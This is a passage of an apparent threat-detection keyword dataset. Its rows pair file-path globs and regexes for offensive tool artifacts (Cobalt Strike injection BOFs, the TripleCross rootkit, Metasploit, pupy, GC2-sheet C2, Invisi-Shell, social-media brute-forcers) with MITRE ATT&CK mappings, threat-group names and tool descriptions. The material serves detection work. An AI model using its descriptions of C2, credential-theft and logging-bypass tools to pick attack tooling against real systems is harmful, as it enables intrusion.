T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Injection/setthreadcontext*",".{0,1000}\/Injection\/setthreadcontext.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Injection/svcctrl/*",".{0,1000}\/Injection\/svcctrl\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Injection/tooltip/*",".{0,1000}\/Injection\/tooltip\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Injection/uxsubclassinfo*",".{0,1000}\/Injection\/uxsubclassinfo.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/injection_lib.so*",".{0,1000}\/injection_lib\.so.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*/Injections/SQL.txt*",".{0,1000}\/Injections\/SQL\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*/injectsu.exp*",".{0,1000}\/injectsu\.exp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/injectsu.lib*",".{0,1000}\/injectsu\.lib.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/injectsu.pdb*",".{0,1000}\/injectsu\.pdb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/injectsu/*",".{0,1000}\/injectsu\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/inline_syscall.git*",".{0,1000}\/inline_syscall\.git.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*/inline_syscall/include/in_memory_init.hpp*",".{0,1000}\/inline_syscall\/include\/in_memory_init\.hpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*/inline-exec/*.exe",".{0,1000}\/inline\-exec\/.{0,1000}\.exe","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/InlineWhispers*",".{0,1000}\/InlineWhispers.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","295","41","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" "*/insta-bf.git*",".{0,1000}\/insta\-bf\.git.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","7","1","47","10","2024-04-23T02:47:28Z","2020-11-20T22:22:48Z" "*/instabf.py*",".{0,1000}\/instabf\.py.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","7","1","47","10","2024-04-23T02:47:28Z","2020-11-20T22:22:48Z" "*/instabrute.py*",".{0,1000}\/instabrute\.py.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","694","270","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" "*/instainsane.git*",".{0,1000}\/instainsane\.git.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","1","N/A","7","6","519","335","2024-02-11T10:29:05Z","2018-12-02T22:48:11Z" "*/instainsane.sh*",".{0,1000}\/instainsane\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","1","N/A","7","6","519","335","2024-02-11T10:29:05Z","2018-12-02T22:48:11Z" "*/install_elevated.py*",".{0,1000}\/install_elevated\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/install_locutus.sh*",".{0,1000}\/install_locutus\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*/install-sb.sh*",".{0,1000}\/install\-sb\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2856","292","2024-03-24T09:16:18Z","2019-03-28T18:07:05Z" "*/insTof.py*",".{0,1000}\/insTof\.py.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","7","1","47","10","2024-04-23T02:47:28Z","2020-11-20T22:22:48Z" "*/interactive_shell.py*",".{0,1000}\/interactive_shell\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/interactive_shell.py*",".{0,1000}\/interactive_shell\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/Intercepter-NG*.apk*",".{0,1000}\/Intercepter\-NG.{0,1000}\.apk.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/interesting-teamsmessages.csv*",".{0,1000}\/interesting\-teamsmessages\.csv.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*/internal/C2/*.go*",".{0,1000}\/internal\/C2\/.{0,1000}\.go.{0,1000}","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","485","98","2024-04-01T15:33:47Z","2021-09-15T19:06:12Z" "*/internal/pipe/pipe.go*",".{0,1000}\/internal\/pipe\/pipe\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*/Internals/Coff.cs*",".{0,1000}\/Internals\/Coff\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*/Inveigh.exe*",".{0,1000}\/Inveigh\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/Inveigh.git*",".{0,1000}\/Inveigh\.git.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*/Inveigh.ps1*",".{0,1000}\/Inveigh\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/Inveigh.txt*",".{0,1000}\/Inveigh\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/Invisi-Shell.git*",".{0,1000}\/Invisi\-Shell\.git.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","1","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*/invocation:tor.service*",".{0,1000}\/invocation\:tor\.service.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/Invoke-Adeleginator*",".{0,1000}\/Invoke\-Adeleginator.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","1","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*/Invoke-ADSBackdoor.ps1*",".{0,1000}\/Invoke\-ADSBackdoor\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access 